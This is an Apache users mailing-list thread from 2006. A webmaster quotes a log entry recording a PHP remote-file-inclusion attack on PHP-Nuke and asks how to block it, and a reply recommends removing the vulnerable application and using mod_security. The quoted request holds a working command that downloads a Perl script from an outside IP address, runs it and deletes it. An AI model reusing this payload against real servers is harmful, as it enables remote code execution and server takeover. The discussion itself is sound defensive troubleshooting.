On 8/7/06, david <dvelayos@xxxxxxxxx> wrote:
Hello! Recently, i've founded some entries on my apache webserver log like this: [IP] - - [05/Aug/2006:02:17:47 +0200] "GET /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*? HTTP/1.0" 200 220151 "-" "Mozilla/5.0" As you can see, some attacker tries to use the index.php file to get a cmd.txt file from other site. are there any way to detect this urls to stop this configuring apache?
If this is actually working on your server, you need to immediately get rid of the application that is allowing it (php-nuke it seems), since it has a major security flaw. In general, mod_security can be used to block suspicious URLs. But it is not a substitute for making sure you only use secure web applications. Joshua. --------------------------------------------------------------------- The official User-To-User support forum of the Apache HTTP Server Project. See <URL:http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx " from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx